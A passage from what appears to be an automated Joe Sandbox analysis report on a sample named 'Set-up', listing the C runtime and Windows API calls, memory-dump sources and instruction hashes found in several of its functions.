                                                                                              • _errno.MSVCR100(?,?), ref: 6BB68439
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6BB68444
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$$
                                                                                              • API String ID: 0-233714265
                                                                                              • Opcode ID: 6cd348a5dd217ca1178e9f3aee923514d3b097b204b1d317a7db7ec938d5a87d
                                                                                              • Instruction ID: 075fbf55e558697a8e07e7b4b19930ab03d5d8594b55e5353b627cf5ca084d72
                                                                                              • Opcode Fuzzy Hash: 6cd348a5dd217ca1178e9f3aee923514d3b097b204b1d317a7db7ec938d5a87d
                                                                                              • Instruction Fuzzy Hash: 40A15970A187619FC314DF29D19091EBBF2FF8A704F11896EE4894B612C734E899CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB7340B
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002), ref: 6BB73438
                                                                                              • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB73455
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB73469
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB7347D
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB734B4
                                                                                              • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB734C6
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB734EA
                                                                                              • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB734FC
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen$wcscpy_s$_calloc_crt_wdupenv_s
                                                                                              • String ID: SystemRoot
                                                                                              • API String ID: 2825862306-2034820756

                                                                                              Control-flow Graph

                                                                                              Similarity
                                                                                              • API ID: NameName::Name::operator+$operator+
                                                                                              • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$const$double$long $signed $unsigned $void$volatile$wchar_t
                                                                                              • API String ID: 919369367-1531502760

                                                                                              Control-flow Graph

1534->1546 1535->1458 1537->1458 1541 6bb8ff3e-6bb8ff5f WriteFile 1537->1541 1538->1486 1539->1528 1543 6bb90036-6bb9004d call 6bbd969c 1539->1543 1541->1450 1544 6bb8ff65-6bb8ff7f 1541->1544 1543->1450 1550 6bb90053-6bb90059 1543->1550 1544->1458 1547 6bb8ff85-6bb8ff8c 1544->1547 1546->1537 1547->1528 1549 6bb8ff92-6bb8ffb8 WriteFile 1547->1549 1549->1450 1551 6bb8ffbe-6bb8ffc5 1549->1551 1550->1528 1551->1458 1552 6bb8ffcb-6bb8ffd7 1551->1552 1552->1528
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32 ref: 6BB700E5
                                                                                              • _isatty.MSVCR100(?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB702BE
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE), ref: 6BB702EF
                                                                                              • __doserrno.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FD95
                                                                                              • _errno.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FD9C
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FDA7
                                                                                              • __doserrno.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDC2
                                                                                              • _errno.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDCA
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDD5
                                                                                              • __lseeki64_nolock.LIBCMT ref: 6BB8FDE6
                                                                                              • _getptd.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FE00
                                                                                              • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB8FE1E
                                                                                              • GetConsoleCP.KERNEL32(?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB8FE3E
                                                                                              • isleadbyte.MSVCR100(00000000), ref: 6BB8FEAE
                                                                                              • __fassign.LIBCMT(?,?,00000002), ref: 6BB8FED8
                                                                                              • __fassign.LIBCMT(?,?,00000001), ref: 6BB8FEFC
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6BB8FF2E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6BB8FF57
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6BB8FFB0
                                                                                              • _putwch_nolock.MSVCR100(?), ref: 6BB90013
                                                                                              • _putwch_nolock.MSVCR100(0000000D), ref: 6BB90040
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
                                                                                              • String ID:
                                                                                              • API String ID: 1737003884-0
                                                                                              • Opcode ID: 75808482fdfb5076dcc6b03df606a70c72b1e9c715eed87b0587de04fb7409d6
                                                                                              • Instruction ID: ff4001fc1df9e5b2dd5f67fbd8efc9d316114e5b5db655d7bbda745e5e03e7d0
                                                                                              • Opcode Fuzzy Hash: 75808482fdfb5076dcc6b03df606a70c72b1e9c715eed87b0587de04fb7409d6
                                                                                              • Instruction Fuzzy Hash: 3A129F35A066A88FDB219F28DC80BD977B4FF0B314F4405EAE41AD7981D7799A80CF52

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB736BF
                                                                                              • _errno.MSVCR100 ref: 6BB736C9
                                                                                              • _wspawnve.MSVCR100(?,?,?,?), ref: 6BB736DA
                                                                                                • Part of subcall function 6BB735D0: wcsrchr.MSVCR100(?,0000005C), ref: 6BB7360D
                                                                                                • Part of subcall function 6BB735D0: wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB73617
                                                                                                • Part of subcall function 6BB735D0: wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB73636
                                                                                                • Part of subcall function 6BB735D0: _waccess_s.MSVCR100(?,00000000), ref: 6BB7364A
                                                                                              • _errno.MSVCR100 ref: 6BB736EE
                                                                                              • _errno.MSVCR100 ref: 6BB736F7
                                                                                              • _errno.MSVCR100 ref: 6BB7371A
                                                                                              • _errno.MSVCR100 ref: 6BB88499
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB884A4
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB884B7
                                                                                              • _errno.MSVCR100 ref: 6BB884C4
                                                                                              • wcschr.MSVCR100(?,0000002F), ref: 6BB884D7
                                                                                              • _wdupenv_s.MSVCR100(?,00000000,PATH), ref: 6BB884F0
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB8850A
                                                                                              • _calloc_crt.MSVCR100(00000104,00000002), ref: 6BB88520
                                                                                              • _wcslen.LIBCMT(00000000), ref: 6BB88549
                                                                                              • wcscat_s.MSVCR100(00000000,00000104,6BB93050), ref: 6BB88567
                                                                                              • _wcslen.LIBCMT(00000000), ref: 6BB88574
                                                                                              • _wcslen.LIBCMT(?,00000000), ref: 6BB8857F
                                                                                              • wcscat_s.MSVCR100(00000000,00000104,?), ref: 6BB8859D
                                                                                              • _errno.MSVCR100 ref: 6BB885AD
                                                                                              • _wspawnve.MSVCR100(?,00000000,?,?), ref: 6BB885BE
                                                                                              • _errno.MSVCR100 ref: 6BB885D2
                                                                                              • __doserrno.MSVCR100 ref: 6BB885DC
                                                                                              • free.MSVCR100(00000000), ref: 6BB8862B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno__invoke_watson_calloc_crt_waccess_s_wdupenv_sfreewcschr
                                                                                              • String ID: PATH
                                                                                              • API String ID: 3726462291-1036084923
                                                                                              • Opcode ID: a46b813423a7757e377d8caea16daa6f804180a32b6348ea1167c17d0804fc95
                                                                                              • Instruction ID: 4cc23ca6b07180cfef1deab58421ed98b8e5807cbf71c537e555d9a9f49b2137
                                                                                              • Opcode Fuzzy Hash: a46b813423a7757e377d8caea16daa6f804180a32b6348ea1167c17d0804fc95
                                                                                              • Instruction Fuzzy Hash: 6651E175804684AFCB31AF75DC819AE3775EF46764B2001A5E83497190FB3DCD41DB62

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB70B2C
                                                                                              • _waccess_s.MSVCR100(?,00000000), ref: 6BB70B36
                                                                                                • Part of subcall function 6BB627B6: GetFileAttributesW.KERNEL32(?), ref: 6BB627D7
                                                                                              • _errno.MSVCR100 ref: 6BB70B43
                                                                                              • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB70B66
                                                                                                • Part of subcall function 6BB6FD24: _lock.MSVCR100(00000007,6BB6FD98,0000000C), ref: 6BB6FD32
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB70B8B
                                                                                              • _errno.MSVCR100(00000000,00000000,00000000), ref: 6BB70BAE
                                                                                              • _wcslen.LIBCMT(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C08
                                                                                              • wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C51
                                                                                              • _waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB70C68
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C8B
                                                                                              • wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB70CA5
                                                                                              • free.MSVCR100(?), ref: 6BB70CE1
                                                                                              • _errno.MSVCR100 ref: 6BB910C4
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB910CE
                                                                                              • _wfullpath.MSVCR100(?,?,?), ref: 6BB910E7
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB9110D
                                                                                              • _wcslen.LIBCMT(?,00000000,00000000,00000000,00000000,00000000), ref: 6BB91118
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB91124
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB9113F
                                                                                              • _errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6BB9115A
                                                                                              • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000), ref: 6BB9116A
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6BB91176
                                                                                              • _errno.MSVCR100 ref: 6BB911AF
                                                                                              • _errno.MSVCR100 ref: 6BB911BA
                                                                                              • free.MSVCR100(?), ref: 6BB911CC
                                                                                              • free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB911F0
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB911F6
                                                                                              • free.MSVCR100(?), ref: 6BB91209
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_wcslenfree$_calloc_crt_waccess_swcscpy_s$AttributesFile__invoke_watson_invalid_parameter_noinfo_lock_wdupenv_s_wfullpath
                                                                                              • String ID:
                                                                                              • API String ID: 1320518012-0
                                                                                              • Opcode ID: 2d16c8cb30f4bf3282a3a46e8449694e65e11ec3c0a60ea0ed7e3f3375987356
                                                                                              • Instruction ID: 2c2194d6abe7543a196652fbeece775504218d1b06cc6af2973fcf23b4f25591
                                                                                              • Opcode Fuzzy Hash: 2d16c8cb30f4bf3282a3a46e8449694e65e11ec3c0a60ea0ed7e3f3375987356
                                                                                              • Instruction Fuzzy Hash: 9D919E71D402A9AEDB25AF74EC89B9D77B8EF05304F5000F6D408A7250FB398E809F91

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B3A0
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6BB6B3BD
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6BB6B3CA
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6BB6B3D7
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6BB6B3E4
                                                                                              • TlsAlloc.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B420
                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B43B
                                                                                              • __init_pointers.LIBCMT ref: 6BB6B445
                                                                                                • Part of subcall function 6BB6B365: _encoded_null.MSVCR100(74DEDFB0,6BB6B44A,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B368
                                                                                                • Part of subcall function 6BB6B365: __initp_misc_winsig.LIBCMT ref: 6BB6B388
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B456
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B463
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B470
                                                                                              • EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B47D
                                                                                              • DecodePointer.KERNEL32(?,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B49E
                                                                                              • _calloc_crt.MSVCR100(00000001,00000214,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4B3
                                                                                              • DecodePointer.KERNEL32(00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4CD
                                                                                              • _initptd.MSVCR100(00000000,00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4D8
                                                                                                • Part of subcall function 6BB6215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000D), ref: 6BB621A4
                                                                                                • Part of subcall function 6BB6215F: InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
                                                                                                • Part of subcall function 6BB6215F: _lock.MSVCR100(0000000C), ref: 6BB621C5
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB6B4DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressEncodeProc$DecodeHandleModule_lock$AllocCurrentIncrementInterlockedThreadValue__init_pointers__initp_misc_winsig_calloc_crt_encoded_null_initptd
                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                              • API String ID: 3305441573-3819984048
                                                                                              • Opcode ID: ae53f31044db2db9ba81f699bc83bbb23e90beae690e7aef5c06f99856b05a30
                                                                                              • Instruction ID: aa2ef2af8f364cb2d1322c414f91f24464f3b5f119c0495e95c99ea989976ee0
                                                                                              • Opcode Fuzzy Hash: ae53f31044db2db9ba81f699bc83bbb23e90beae690e7aef5c06f99856b05a30
                                                                                              • Instruction Fuzzy Hash: 403182319002E1AEDF21AF76CC06A163BF4EB9A7A5B16061FE42483150EB7AC941CF70
                                                                                              APIs
                                                                                              • operator+.LIBCMT ref: 6BBD6146
                                                                                                • Part of subcall function 6BBD5907: DName::DName.LIBCMT ref: 6BBD591A
                                                                                                • Part of subcall function 6BBD5907: DName::operator+.LIBCMT ref: 6BBD5921
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::Name::operator+operator+
                                                                                              • String ID:
                                                                                              • API String ID: 2937105810-0
                                                                                              • Opcode ID: 4dcb17e78cb6c50a451538c0a1ceaf6eef10898e2428128b8da718cf2d4d1818
                                                                                              • Instruction ID: 5e5795d7caaec2bca71bacc54d6cfaab31061ee1c79fee7872847ac7f28ffc28
                                                                                              • Opcode Fuzzy Hash: 4dcb17e78cb6c50a451538c0a1ceaf6eef10898e2428128b8da718cf2d4d1818
                                                                                              • Instruction Fuzzy Hash: EAD13075900289AFDF05DFA8D881AEEBBF8EF05354F10406AE515E7290EB3CDA45CB51
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB512D7
                                                                                              • free.MSVCR100(?), ref: 6BB5131B
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB654FE
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • _calloc_crt.MSVCR100(00000180,00000002,00000004), ref: 6BB6550E
                                                                                              • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000002,00000004), ref: 6BB65519
                                                                                              • _calloc_crt.MSVCR100(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6BB65524
                                                                                              • _calloc_crt.MSVCR100(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6BB65533
                                                                                              • GetCPInfo.KERNEL32(?,?), ref: 6BB65586
                                                                                              • ___crtGetStringTypeA.LIBCMT ref: 6BB655CA
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6BB655FD
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6BB6562A
                                                                                              • memcpy.MSVCR100(?,?,000000FE), ref: 6BB65684
                                                                                              • memcpy.MSVCR100(?,?,0000007F,?,?,000000FE), ref: 6BB65693
                                                                                              • memcpy.MSVCR100(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6BB656A5
                                                                                              • free.MSVCR100(?), ref: 6BB656FA
                                                                                                • Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164
                                                                                              • free.MSVCR100(?,?), ref: 6BB90A76
                                                                                              • free.MSVCR100(?,?,?), ref: 6BB90A7E
                                                                                              • free.MSVCR100(?,?,?,?), ref: 6BB90A86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$_calloc_crt$Stringmemcpy$__crt$DecrementFreeHeapInfoInterlockedType___crt_malloc_crtmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 3303389740-0
                                                                                              • Opcode ID: f25745781956eeccf69593e50eee2aa33bfea91bb05e9ce17e2f4de7d2287501
                                                                                              • Instruction ID: 94fa8db88e8c8e9c8cca79343caa8dd75be028f1ea3e0345be54e85ecdf32ac0
                                                                                              • Opcode Fuzzy Hash: f25745781956eeccf69593e50eee2aa33bfea91bb05e9ce17e2f4de7d2287501
                                                                                              • Instruction Fuzzy Hash: 01B18BB2D00289AFEB10CFA9C891BEEBBF5FF09304F44006DE555A7250E739A951CB65
                                                                                              APIs
                                                                                              • wcsnlen.MSVCR100(?,00007FFF), ref: 6BB726ED
                                                                                              • wcsnlen.MSVCR100(?,00007FFF,?,00007FFF), ref: 6BB726F8
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002), ref: 6BB72717
                                                                                              • wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6BB7272E
                                                                                              • wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6BB7274B
                                                                                                • Part of subcall function 6BB7248A: wcschr.MSVCR100(00000000,0000003D,74DEDF80,00000000,01331910), ref: 6BB724B5
                                                                                                • Part of subcall function 6BB7248A: free.MSVCR100(?,74DEDF80,00000000,01331910), ref: 6BB72528
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB72789
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB727A5
                                                                                              • _calloc_crt.MSVCR100(00000000,00000001), ref: 6BB727B2
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB727CB
                                                                                              • _strlen.LIBCMT(?), ref: 6BB727DD
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6BB727FB
                                                                                              • _errno.MSVCR100 ref: 6BB72820
                                                                                              • _errno.MSVCR100 ref: 6BB90FD6
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB90FE1
                                                                                              • wcschr.MSVCR100(?,0000003D), ref: 6BB90FF1
                                                                                              • wcsnlen.MSVCR100(-00000002,00007FFF), ref: 6BB91015
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB91021
                                                                                              • _calloc_crt.MSVCR100(00000001,00000002,?), ref: 6BB9102C
                                                                                              • wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6BB91042
                                                                                              • _errno.MSVCR100 ref: 6BB9104F
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB9105A
                                                                                              • free.MSVCR100(?), ref: 6BB91075
                                                                                              • free.MSVCR100(?), ref: 6BB91097
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$_strlen_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 928254730-0
                                                                                              • Opcode ID: be26e0fc733374c5904f27346f85945ed9d0c668de09a7d20da8501be59f9abe
                                                                                              • Instruction ID: 29153244b1c8a177a6f063a3a1edeb0493ed394698647bbdde52c4c99c0b06e5
                                                                                              • Opcode Fuzzy Hash: be26e0fc733374c5904f27346f85945ed9d0c668de09a7d20da8501be59f9abe
